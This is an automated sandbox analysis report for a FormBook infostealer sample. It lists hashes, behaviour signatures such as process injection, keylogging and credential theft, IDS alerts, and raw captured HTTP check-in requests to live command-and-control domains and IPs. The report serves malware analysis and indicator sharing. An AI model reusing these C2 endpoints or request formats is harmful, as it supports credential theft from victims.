Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MV KODCO.exe

Overview

General Information

Sample name:MV KODCO.exe
Analysis ID:1558145
MD5:864eeb9f741f971ef200951018a042a2
SHA1:91d4083caed9945d7c5fa70034cfe1b4d61a990c
SHA256:35c31002aa17d39dc34b9268f9a58968e4d7b530c3cc0d5076f4633e0a338be4
Tags:exeuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • MV KODCO.exe (PID: 7504 cmdline: "C:\Users\user\Desktop\MV KODCO.exe" MD5: 864EEB9F741F971EF200951018A042A2)
    • svchost.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\MV KODCO.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • cMOROZNpvCGcdz.exe (PID: 2412 cmdline: "C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • srdelayed.exe (PID: 7840 cmdline: "C:\Windows\SysWOW64\srdelayed.exe" MD5: B5F31FDCE1BE4171124B9749F9D2C600)
        • ktmutil.exe (PID: 7848 cmdline: "C:\Windows\SysWOW64\ktmutil.exe" MD5: AC387D5962B2FE2BF4D518DD57BA7230)
          • cMOROZNpvCGcdz.exe (PID: 2688 cmdline: "C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8012 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000007.00000002.2931811558.0000000002EF0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.1970475170.0000000000420000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.2933217296.0000000003410000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.2933301048.0000000003460000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000008.00000002.2934945031.0000000005220000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            1.2.svchost.exe.420000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              1.2.svchost.exe.420000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\MV KODCO.exe", CommandLine: "C:\Users\user\Desktop\MV KODCO.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\MV KODCO.exe", ParentImage: C:\Users\user\Desktop\MV KODCO.exe, ParentProcessId: 7504, ParentProcessName: MV KODCO.exe, ProcessCommandLine: "C:\Users\user\Desktop\MV KODCO.exe", ProcessId: 7524, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\MV KODCO.exe", CommandLine: "C:\Users\user\Desktop\MV KODCO.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\MV KODCO.exe", ParentImage: C:\Users\user\Desktop\MV KODCO.exe, ParentProcessId: 7504, ParentProcessName: MV KODCO.exe, ProcessCommandLine: "C:\Users\user\Desktop\MV KODCO.exe", ProcessId: 7524, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-19T03:24:44.213139+010020507451Malware Command and Control Activity Detected192.168.2.449742154.92.61.3780TCP
                2024-11-19T03:25:07.708143+010020507451Malware Command and Control Activity Detected192.168.2.4497863.33.130.19080TCP
                2024-11-19T03:25:21.437279+010020507451Malware Command and Control Activity Detected192.168.2.449852203.161.49.19380TCP
                2024-11-19T03:25:34.924642+010020507451Malware Command and Control Activity Detected192.168.2.4499153.33.130.19080TCP
                2024-11-19T03:25:48.391343+010020507451Malware Command and Control Activity Detected192.168.2.4499793.33.130.19080TCP
                2024-11-19T03:26:01.958343+010020507451Malware Command and Control Activity Detected192.168.2.450028198.252.98.5480TCP
                2024-11-19T03:26:16.234362+010020507451Malware Command and Control Activity Detected192.168.2.450032103.224.182.24280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-19T03:24:44.213139+010028554651A Network Trojan was detected192.168.2.449742154.92.61.3780TCP
                2024-11-19T03:25:07.708143+010028554651A Network Trojan was detected192.168.2.4497863.33.130.19080TCP
                2024-11-19T03:25:21.437279+010028554651A Network Trojan was detected192.168.2.449852203.161.49.19380TCP
                2024-11-19T03:25:34.924642+010028554651A Network Trojan was detected192.168.2.4499153.33.130.19080TCP
                2024-11-19T03:25:48.391343+010028554651A Network Trojan was detected192.168.2.4499793.33.130.19080TCP
                2024-11-19T03:26:01.958343+010028554651A Network Trojan was detected192.168.2.450028198.252.98.5480TCP
                2024-11-19T03:26:16.234362+010028554651A Network Trojan was detected192.168.2.450032103.224.182.24280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-19T03:25:00.066293+010028554641A Network Trojan was detected192.168.2.4497493.33.130.19080TCP
                2024-11-19T03:25:02.606408+010028554641A Network Trojan was detected192.168.2.4497603.33.130.19080TCP
                2024-11-19T03:25:05.151591+010028554641A Network Trojan was detected192.168.2.4497713.33.130.19080TCP
                2024-11-19T03:25:13.673163+010028554641A Network Trojan was detected192.168.2.449814203.161.49.19380TCP
                2024-11-19T03:25:16.255654+010028554641A Network Trojan was detected192.168.2.449825203.161.49.19380TCP
                2024-11-19T03:25:18.865756+010028554641A Network Trojan was detected192.168.2.449840203.161.49.19380TCP
                2024-11-19T03:25:27.270615+010028554641A Network Trojan was detected192.168.2.4498783.33.130.19080TCP
                2024-11-19T03:25:29.826729+010028554641A Network Trojan was detected192.168.2.4498923.33.130.19080TCP
                2024-11-19T03:25:32.373428+010028554641A Network Trojan was detected192.168.2.4499033.33.130.19080TCP
                2024-11-19T03:25:40.747620+010028554641A Network Trojan was detected192.168.2.4499423.33.130.19080TCP
                2024-11-19T03:25:43.297083+010028554641A Network Trojan was detected192.168.2.4499553.33.130.19080TCP
                2024-11-19T03:25:45.845642+010028554641A Network Trojan was detected192.168.2.4499673.33.130.19080TCP
                2024-11-19T03:25:54.222386+010028554641A Network Trojan was detected192.168.2.450008198.252.98.5480TCP
                2024-11-19T03:25:56.807826+010028554641A Network Trojan was detected192.168.2.450019198.252.98.5480TCP
                2024-11-19T03:25:59.358599+010028554641A Network Trojan was detected192.168.2.450027198.252.98.5480TCP
                2024-11-19T03:26:08.616555+010028554641A Network Trojan was detected192.168.2.450029103.224.182.24280TCP
                2024-11-19T03:26:11.154468+010028554641A Network Trojan was detected192.168.2.450030103.224.182.24280TCP
                2024-11-19T03:26:13.701826+010028554641A Network Trojan was detected192.168.2.450031103.224.182.24280TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: MV KODCO.exeReversingLabs: Detection: 36%
                Source: Yara matchFile source: 1.2.svchost.exe.420000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.420000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2931811558.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1970475170.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2933217296.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2933301048.0000000003460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2934945031.0000000005220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1972961447.0000000005F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2933293097.0000000002520000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1971212248.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: MV KODCO.exeJoe Sandbox ML: detected
                Source: MV KODCO.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cMOROZNpvCGcdz.exe, 00000003.00000000.1894546864.000000000077E000.00000002.00000001.01000000.00000005.sdmp, cMOROZNpvCGcdz.exe, 00000008.00000000.2043472894.000000000077E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: MV KODCO.exe, 00000000.00000003.1705038338.0000000003650000.00000004.00001000.00020000.00000000.sdmp, MV KODCO.exe, 00000000.00000003.1709281897.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1970845605.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1877929427.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1876115604.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1970845605.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000002.2933545853.000000000381E000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000003.1980153193.00000000034CC000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000003.1978038494.000000000331D000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000002.2933545853.0000000003680000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: MV KODCO.exe, 00000000.00000003.1705038338.0000000003650000.00000004.00001000.00020000.00000000.sdmp, MV KODCO.exe, 00000000.00000003.1709281897.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1970845605.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1877929427.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1876115604.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1970845605.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000002.2933545853.000000000381E000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000003.1980153193.00000000034CC000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000003.1978038494.000000000331D000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000002.2933545853.0000000003680000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdbGCTL source: svchost.exe, 00000001.00000002.1970664504.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1970644379.0000000000800000.00000004.00000020.00020000.00000000.sdmp, cMOROZNpvCGcdz.exe, 00000003.00000002.2932816797.0000000000898000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdb source: svchost.exe, 00000001.00000002.1970664504.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1970644379.0000000000800000.00000004.00000020.00020000.00000000.sdmp, cMOROZNpvCGcdz.exe, 00000003.00000002.2932816797.0000000000898000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ktmutil.exe, 00000007.00000002.2934218467.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000007.00000002.2932130624.0000000003223000.00000004.00000020.00020000.00000000.sdmp, cMOROZNpvCGcdz.exe, 00000008.00000002.2933775906.0000000002DEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2269719976.0000000023BAC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ktmutil.exe, 00000007.00000002.2934218467.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000007.00000002.2932130624.0000000003223000.00000004.00000020.00020000.00000000.sdmp, cMOROZNpvCGcdz.exe, 00000008.00000002.2933775906.0000000002DEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2269719976.0000000023BAC000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00626CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00626CA9
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_006260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_006260DD
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_006263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_006263F9
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0062EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0062EB60
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0062F56F FindFirstFileW,FindClose,0_2_0062F56F
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0062F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0062F5FA
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00631B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00631B2F
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00631C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00631C8A
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00631F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00631F94

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49742 -> 154.92.61.37:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49742 -> 154.92.61.37:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49786 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49814 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49825 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49786 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49749 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49915 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49915 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49840 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49852 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49852 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49955 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49903 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49979 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49892 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49878 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49967 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50008 -> 198.252.98.54:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49979 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 198.252.98.54:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50028 -> 198.252.98.54:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50028 -> 198.252.98.54:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 198.252.98.54:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49942 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50032 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50032 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 103.224.182.242:80
                Source: DNS query: www.huiguang.xyz
                Source: DNS query: www.schedulemassage.xyz
                Source: Joe Sandbox ViewIP Address: 203.161.49.193 203.161.49.193
                Source: Joe Sandbox ViewASN Name: HAWKHOSTCA HAWKHOSTCA
                Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00634EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00634EB5
                Source: global trafficHTTP traffic detected: GET /hv6g/?jD=VzTtTZ&1H=vSitAQgQO9xnWjtO9fvjetkh7TKEKyOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGP+O9AD54eipMHpO96aeC1LnvmikAK9niWdM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.huiguang.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /79tr/?1H=vB4016rwfH0Mxta3WHz8fHaIVIRa7jPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8AE/MzANUKvMVkOqK7vCy8Yr4bj2qmMHLkQ=&jD=VzTtTZ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.beingandbecoming.ltdConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /hxmz/?jD=VzTtTZ&1H=xeYt+TVrluKccowmz5a5GltLZ9YZ3snijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70c0RaNOmwh+TnBkmQn+jSxAt6pokQYbXkws= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.futurevision.lifeConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /slxp/?1H=QrWs1MGbYyQFoq3udSaW2R0wE8dP0+vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOs/0Bo4314wmW6buSFT8Qs1kQOmXTHHnWTO0=&jD=VzTtTZ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.schedulemassage.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /0598/?1H=t68BN09iVeqb/IuMYFog8KGcDQiER6CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dOWWiTyMXvF8kyx1KEOeQXc/yVhXxnErc2M=&jD=VzTtTZ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mcfunding.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /y3dc/?1H=ihLGZn7rk3oJmiIz33Bz1E4xhZDY72dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tRERgPwyb4b9y8rXeUu2h/5aaRRGXSXrvcfb4U=&jD=VzTtTZ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.migorengya8.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.huiguang.xyz
                Source: global trafficDNS traffic detected: DNS query: www.beingandbecoming.ltd
                Source: global trafficDNS traffic detected: DNS query: www.futurevision.life
                Source: global trafficDNS traffic detected: DNS query: www.schedulemassage.xyz
                Source: global trafficDNS traffic detected: DNS query: www.mcfunding.org
                Source: global trafficDNS traffic detected: DNS query: www.migorengya8.click
                Source: global trafficDNS traffic detected: DNS query: www.klohk.tech
